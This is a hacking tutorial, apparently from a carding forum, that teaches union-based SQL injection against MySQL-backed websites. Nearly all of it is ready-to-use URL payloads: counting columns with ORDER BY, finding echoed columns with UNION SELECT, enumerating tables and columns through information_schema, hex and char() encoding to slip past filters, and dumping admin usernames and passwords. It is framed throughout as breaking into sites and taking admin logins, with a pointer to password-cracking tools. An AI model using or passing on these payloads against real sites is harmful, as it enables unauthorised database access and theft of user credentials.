mysql has 2 types only as mentioned above.you need to know the following things about the db you are attacking-

# number of columns
# table names
# column names

# let's start with union attack, the most common, every n00b should no it -

code:
=> http://test.com/index.php?id=1 order by 10--
^ this gives me an error

let's again try

code:
=> http://test.com/index.php?id=1 order by 7--
^ this gives me an error

let's try again

code:
=> http://test.com/index.php?id=1 order by 5--
whoa !! the page is loading normally

it means, number of columns => 5
you can do it with mssql as well.

# now the next part-
i'm using union select statement.

code:
=> http://test.com/index.php?id=1 union all select 1,2,3,4,5--
if it doesn't gives you anything, change the first part of the query to a negative value.

code:
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5--
it'll show some number on you screen. in my case it is 2. now we know that column 2 will echo data back to us.

# getting mysql version

code:
=> http://test.com/index.php?id=-1 union all select 1,@@version,3,4,5--
if you do not get with this try this-

code:
=> http://test.com/index.php?id=-1 union select 1,version()),3,4,5--
now you will get get the version name

it can be-

# 5+
# 5>

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

table extraction for version 5+ :

code:
=> http://test.com/index.php?id=-1 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables--
it'll show a lot of tables, if you want to get into the site, usually you need to get the admin's login info
so, in my case i need to exploit into a table named => admin

which contains information, i need

now i got the tables names & i need to extract the column names from them so the query will be-

code:
=> http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=admin--
this will show you the column names inside the table admin. if it gives you an error you need to change the text value of admin to mysql char.
i use hackbar, a firefox addon to do so.

so char of admin is =>char(97, 100, 109, 105, 110)

therefore the query will be-

=> code:
http://test.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=char(97, 100, 109, 105, 110)--
it show the columns names to me. in my case they are-

# user_name
# user_password
# ***
# uid

we only need to know username & pass so we reject the rest two. okay ?

the next query will be for extracting the final data i need-

=> http://test.com/index.php?id=-1 union all select 1,group_concat(user_name,0x3a,user_password),3,4,5 from admin--

where 0x3a is the hex value of => :

voila !

i got the username & pass, it is => adminassword

password can also be encrypted. so you can use few online decrypters or a software i know => password pro

read more: http://cardingmafia.ws/f26/mysql-inj...#ixzz3uqcbwv9q